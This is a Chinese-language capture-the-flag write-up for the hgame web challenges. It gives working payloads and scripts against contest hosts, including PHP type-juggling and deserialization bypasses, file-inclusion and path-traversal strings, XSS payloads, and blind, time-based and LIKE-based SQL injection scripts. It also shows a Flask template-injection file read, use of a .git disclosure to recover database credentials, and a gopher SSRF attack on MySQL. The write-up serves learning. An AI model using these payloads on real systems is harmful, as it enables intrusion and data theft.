hgame-webwp

web篇

Are you from Europe?

cnss原题,就flag改了下,对了,似乎概率也被修改了....所以不能通过改参数的方式拿flag了.. flag:hgame{Th3\_Ch0seN\_0nE!}

special number

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
include_once("flag.php");
    if(isset($_GET['key'])){
        $pattern = '/^(?=.*[0-9].*)(?=.*[a-zA-Z].*).{7,}$/ ';
        $key = $_GET['key'];
        if(preg_match($pattern,$key)===0){
            echo "格式错误";
        }else{
            $lock="******************";
            $b = json_decode($key);
            if($b==$lock)
                echo $flag;
            else
                echo "this is no special number";
        }
    }

考的弱类型 0e绕过

1
http://118.25.18.223:10001/?key=0e123321123
1
hgame{pHp_w34k_typing_s000_e4sy}

can u find me?

明示robots.txt 查看/f1aaaaaaaag.php 提示管理员才可以拿flag 改cookie hgame{78e01ee77a39ef4e}

tell me what you want

get一个flag,发现要post,post之后提示要改xff然后ua啊referer啊什么的一堆东西不多写了 hgame{For9e\_hTTp\_iS\_N0T\_HArd}

我们不一样

strcmp,数组绕过 hgame{g3t\_f14g\_is\_so0000\_ez}

Random?

.swp文件泄漏vim -r random.php.swp拿源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php
error_reporting(0);
include ('flag.php');

class emmm
{
    var $public;
    var $secret;
}

if ($_GET['emmm']) {
    $emmm = unserialize($_GET['emmm']);
        if (!is_object($emmm)) {
        die("error");
    }
    $emmm->public = random_int(0, 100000000);
    $emmm->secret = random_int(0, 100000000);
    if ($emmm->public == $emmm->secret) {
        echo $flag;
    }
}

#highlight_file(__FILE__);

稍微看一下,引用绕过

1
2
3
4
5
6
7
8
9
10
<?php
class emmm
{
    var $public;
    var $secret;
}

$temp=new emmm();
$temp->public = &$temp->secret;
var_dump(serialize($temp));
1
http://123.206.203.108:10001/random.php?emmm=O:4:%22emmm%22:2:{s:6:%22public%22;N;s:6:%22secret%22;R:2;}

拿到flag: hgame{&\_Is\_wondeRful!@#}

草莓社区-2

文件包含, php伪协议php://filter/read=convert.base64-encode/resource=../flag.php 拿到一个base64,解两次 hgame{!m4o\_pi4n\_ChaO\_hao\_kan!}

草莓社区-1

直接访问 http://118.25.18.223:10011/show_maopian.php?mao=../flag.php hgame{#Ma0\_pi4n\_haO\_k4n\_ma#}

xss-1

1
2
3
4
5
6
7
function charge(input) {
    input = input.replace(/script/gi, '_');
    input = input.replace(/image/gi, '_');
    input = input.replace(/\(/, '_');

    return '<article>' + input + '</article>';
}

然后不允许交互 直接img标签.然后括号被过滤掉

1
2
(->(
)->)

最终payload

1
<img src="1" onerror=alert(1)>

xss-2

1
2
3
4
5
6
7
8
function charge(input) { 
            input = input.replace(/script/gi, '_'); 
            input = input.replace(/img/gi, '_'); 
            input = input.replace(/image/gi, '_'); 
            input = input.replace(/\(/, '_');
            input = input.replace(/\>/,'_');
            return '<input value="' + input + '" type="text">'; 
            }

然后用input标签的image属性绕

payload
1
1" type="image" src=1 onerror=alert(1);"

最简单的sql题

万能密码 帐号随意 密码123'or'1'='1 hgame{@s0ng\_fen\_ti@}

送分的SQLi

sqlmap -u http://118.25.18.223:10068/?id=1 -D week3_sqliiii2 -T f111aa4g --dump

1
2
3
4
5
+-------+---------------+-----------------------------------+
 id     dajiangyoude   f111aaaggg_w3                     
+-------+---------------+-----------------------------------+
 10086  kan_wo_gan_ma  hgame{Th3_e4sist_sql_injeCti0n##} 
+-------+---------------+-----------------------------------+
hgame{Th3\_e4sist\_sql\_injeCti0n##}

简单的SQLi

要求输入一个满足的值,使其hash的4-8位为目标值,然后再输入id,直接上脚本就好了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
from md5 import md5
import requests
import re

# 注:md5自己写,这个import的是我嫌麻烦自己加的
def find_md5(code):
    for each in range(1000000):
        if md5(each)[4:8]==code:
            return each

u=requests.session()
r=u.get('http://118.25.18.223:10086/')
ok=0
for num in range(1,100):
    for each in range(1,129):
        #id_1= "1' and (ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),{num},1))={each})%23".format(num=num,each=each)
        #id_1= "1' and (ascii(mid((select group_concat(column_name) from information_schema.columns where table_name=\"w3_fllllllll4ag\"),{num},1))={each})%23".format(num=num,each=each)
        id_1= "1' and (ascii(mid((select f111144g_w3_sqli1 from w3_fllllllll4ag limit 0,1),{num},1))={each})%23".format(num=num,each=each)
        code = re.findall(r':="(.{4})"',r.text)[0]
        code = find_md5(code)
        r=u.get('http://118.25.18.223:10086/?id='+str(id_1)+"&code="+str(code))
        if "query ok" in r.text:
            print(chr(each),end='')
            break
        if each==128:
            ok=1

    if ok==1:
        break

表:users,w3_fllllllll4ag 列:dajiangyoude,haishijiangyou,f111144g_w3_sqli1 flag:hgame{sql\_Injection\_s000oo\_fun}

正常的SQLi

.bak文件泄漏,源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
.....

$username = base64_decode($_COOKIE['name']);

.....

$sql = "select * from user where username = '{$username}'";
$re = mysqli_query($conn, $sql);
$rs = mysqli_fetch_array($re);

// echo $rs['flag'];
echo $username . '<br/>';
echo "因为出题人太懒了,所以现在没有任何功能";

.....

当天做的时候似乎题目是出了点问题...反正一直出错来着... 不过第二天好了... 语句只是执行,所以sleep注一下 给个脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
import requests
import base64

for num in range(1,50):
    for each in range(33,129):
        ok=0
        #data='''99\' or if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{num},1))={ascii1},sleep(5),1)#'''.format(num=num,ascii1=each)
        #data='''99\' or if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="user"),{num},1))={ascii1},sleep(5),1)#'''.format(num=num,ascii1=each)
        data='''99\' or if(ascii(substr((select flag from user limit 0,1),{num},1))={ascii1},sleep(5),1)#'''.format(num=num,ascii1=each)

        headers = {"Cookie":"name="+base64.b64encode(data.encode()).decode()}                    
        try:
            r=requests.get('http://123.206.203.108:10010/normalSQLi/index.php',headers=headers,timeout=5)
            #print(r.text)
        except:
            print(chr(each),end='')
            break

        if each==128:
            ok=1
    if ok==1:
        break

表:user 列:id,flag,username 然后注意最后提取flag的时候limit一下,在limit 2,1的时候找到flag flag:hgame{fLag\_1s\_h4re.....}

**书店

hint:外部实体 一发blind xxe 详情见前一篇moctf的题解最后一题 hgame{Xxe\_v3ry\_funny!!!!}

ngc's blog

一开始没啥思路,然后信息收集一下 发现是flask,猜想sstl,然后试了一下 访问

1
http://111.230.105.104:5000/aaaaaaaaa{{7+7}}

得到

1
http://111.230.105.104:5000/aaaaaaaaa14

即猜想正确 直接去搞flag就ok,推荐文章https://www.cnblogs.com/tyomcat/p/5440488.html 直接访问:

1
http://111.230.105.104:5000/aaaaaaaaa{{ ''.__class__.__mro__[2].__subclasses__()[40]('flag').read() }}

拿到flag:hgame{skdvhdsbvadvnjVADBVS}

又双叒叕是SQLI

index.php~泄漏拿到源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<?php
    error_reporting(0);
    include("sql.php");
    $waf="/(sleepbenchmarkuniongroup by=><hex lowerstrcmpupdatexmlxmlelementextractvalueconcatbinsleepmid\(substrleftascii\/\*\*\/)/i";
    if(isset($_GET['user'])){
        if(preg_match_all($waf,$_GET['user'])!=0){
            $user="admin";
        }else{
            $user = str_replace("'","\'",$_GET['user']);
        }
        //echo $user."<br>";

        $sqli = new mysqli($host,$username,$passwd,$database);
        $sqli->set_charset("gbk");
        $query="select * from users where username='".$user."'";
        $result = $sqli->query($query);
        //echo $sqli->error;
        $num=0;
        @$num = $result->num_rows;
        if($num>0){
            while($row = $result->fetch_row()){
                echo $row[0]."    ".$row[1]."   ".$row[2]."<br>";
            }
        }
    }

看了一下,like没过滤,放个脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
import requests


payload = []
res = []
ok=0
for num in range(50):
    for each in range(33,129):
        #payload = "lalalala%df'or(select(table_name)from(information_schema.tables)where(table_schema%0alike%0adatabase())limit%0a0,1)like\""
        #payload = "lalalala%df'or(select(column_name)from(information_schema.columns)where(table_name%0alike\"flllllag\")limit%0a1,1)like\""
        payload = "lalalala%df'or(select%0athisisflag%0afrom(flllllag)limit%0a0,1)like%0a0x"
        payload = list(payload)
        if chr(each)!='%' and chr(each)!="_":
            res.append(str(hex(each))[2:])
            payload.append(''.join(res))
            payload.append('25%23')
            r=requests.get('http://118.25.18.223:10088/?user='+''.join(payload))

            if "guest" in r.text:
                print(''.join(res))
                break


            else:
                res.pop()
        else:
            res.append("5c")
            res.append(str(hex(each))[2:])
            payload.append(''.join(res))
            payload.append('25%23')
            r=requests.get('http://118.25.18.223:10088/?user='+''.join(payload))

            if "guest" in r.text:
                print(''.join(res))
                break


            else:
                res.pop()
                res.pop()

        if each==128:
            ok=1

    if ok==1:
        break

拿到flag hgame{like!injection!so!g00d##}

散落的flag

考的前端,做出来了都还没发现... 看个js,发现

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
function get_userinfo(){
    var user = $("#user").text();
    $.ajax({ 
        url: "check_user.php",   
        type: "POST", 
        data:{username:user}, 
        dataType: "json", 
        error: function(){   
            $("#username").html('Error loading XML document');   
        },   
        success: function(data,status){
           $("#username").html("username: "+data[0]);
           $("#secret").html("secret: "+data[1]);
        } 
   });
}

$(document).ready(get_userinfo());

然后去ff的hackbar发包, 发个admin拿到10c546b2cf68 发个admin1拿到hgame{0102940de1 注册然后找回密码拿到98924acfce} 合并一下 hgame{0102940de110c546b2cf6898924acfce} 话说我做的时候有人把密码改成了123456,我直接就拿到了最后一个flag,就感觉很ez...

奇怪的SQLi

环境差不多配好了:http://119.28.22.85:12345 但是gopher似乎连不上sql..也可能是我配置的问题 首先.git泄漏,githack一发,之前那个脚本不行..搞不到log,推荐一个脚本 https://github.com/BugScanTeam/GitHack 然后拿到之后log一下,然后reset一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
root@VM-89-127-ubuntu:/home/ubuntu/GitHack# python GitHack.py http://119.28.22.85:12345/.git

  ____ _ _   _   _            _
 / ___(_) _    __ _  ___  __
   _  __ _ / _` / __ / /
 _   _  _   (_  (__   <
 \_____\___ _\__,_\____\_\{0.0.5}
 A '.git' folder disclosure exploit.

[*] Check Depends
[+] Check depends end
[*] Set Paths
[*] Target Url: http://119.28.22.85:12345/.git/
[*] Initialize Target
[*] Try to Clone straightly
[*] Clone
Cloning into '/home/ubuntu/GitHack/dist/119.28.22.85_12345'...
fatal: repository 'http://119.28.22.85:12345/.git/' not found
[-] Clone Error
[*] Try to Clone with Directory Listing
[*] http://119.28.22.85:12345/.git/ is not support Directory Listing
[-] [Skip][First Try] Target is not support Directory Listing
[*] Try to clone with Cache
[*] Initialize Git
[*] Cache files
[*] packed-refs
[*] config
[*] HEAD
[*] COMMIT_EDITMSG
[*] FETCH_HEAD
[*] /refs/heads/master
[*] index
[*] logs/HEAD
[*] refs/heads/master
[*] logs/refs/heads/master
[*] Fetch Commit Objects
[*] objects/e6/f0a50eaedaa25a44083a3f832a264cea3ba13a
[*] objects/e2/f3ab9cf26f6534d9f04cb4bbbfc7770f3486ee
[*] objects/32/2224a7f61c9d11c62fefa321ff506a24fa2d10
[*] objects/dd/45ee5b5130bde3febd21ccb823d1a9cb341fb5
[*] objects/98/acd10c8f8a476b279e391a4994fd1413a00800
[*] objects/60/019e79f3d3f4d72da7bfcbafcb44cda0da8a84
[*] objects/0d/abdd663cc60676956c8090d0f48e63b4456c03
[*] objects/21/1fcb8891233bebe0aa087642123c3b43e8d3b0
[*] objects/da/51001a93a4c74f4159b562449328ce16b90fe3
[*] objects/97/43c8a21fe4e953da555ac0f14d4ca4a1bd4302
[*] objects/db/c5e076915b5c190cc5922d15f705b6f5a4c13a
[*] objects/a9/a17e440192ca8ff4c69e52bbecadba78ef4140
[*] objects/89/a72a47dd1e777db9c845cf31a569c9df791134
[*] Fetch Commit Objects End
[*] refs/stash
[*] Valid Repository
[+] Valid Repository Success

[+] Clone Success. Dist File : /home/ubuntu/GitHack/dist/119.28.22.85_12345
root@VM-89-127-ubuntu:/home/ubuntu/GitHack# ls
data  dist  GitHack.py  lib  LICENSE  README.md
root@VM-89-127-ubuntu:/home/ubuntu/GitHack# cd dist
root@VM-89-127-ubuntu:/home/ubuntu/GitHack/dist# ls
119.28.22.85_12345
root@VM-89-127-ubuntu:/home/ubuntu/GitHack/dist# cd 119.28.22.85_12345
root@VM-89-127-ubuntu:/home/ubuntu/GitHack/dist/119.28.22.85_12345# ls
css  index.html  index.php  login.html  login.php  register.html  register.php
root@VM-89-127-ubuntu:/home/ubuntu/GitHack/dist/119.28.22.85_12345# git log
commit e6f0a50eaedaa25a44083a3f832a264cea3ba13a
Author: blacsheep <784522717@qq.com>
Date:   Thu Mar 8 15:16:38 2018 +0000

    remove config

commit 322224a7f61c9d11c62fefa321ff506a24fa2d10
Author: blacsheep <784522717@qq.com>
Date:   Thu Mar 8 15:15:17 2018 +0000

    add php
root@VM-89-127-ubuntu:/home/ubuntu/GitHack/dist/119.28.22.85_12345# git reset --hard 322224a7f61c9d11c62fefa321ff506a24fa2d10
HEAD is now at 322224a add php
root@VM-89-127-ubuntu:/home/ubuntu/GitHack/dist/119.28.22.85_12345# ls
config.php  css  index.html  index.php  login.html  login.php  register.html  register.php
root@VM-89-127-ubuntu:/home/ubuntu/GitHack/dist/119.28.22.85_12345# cat config.php
<?php
error_reporting(0);

$db_host = 'localhost';
$db_name = 'week4';
$db_user = 'blacsheep';
$db_pwd = 'cnss';
$conn = mysqli_connect($db_host, $db_user, $db_pwd, $db_name);
if(!$conn){
    die(mysqli_connect_error());
}

root@VM-89-127-ubuntu:/home/ubuntu/GitHack/dist/119.28.22.85_12345#

然后拿到mysql的帐号密码,然后有个ssrf,gopher打mysql 推荐文章:http://www.freebuf.com/articles/web/159342.html exp:https://github.com/undefinedd/extract0r- 跑一下拿到flag,本地环境等有时间我再去弄一下吧..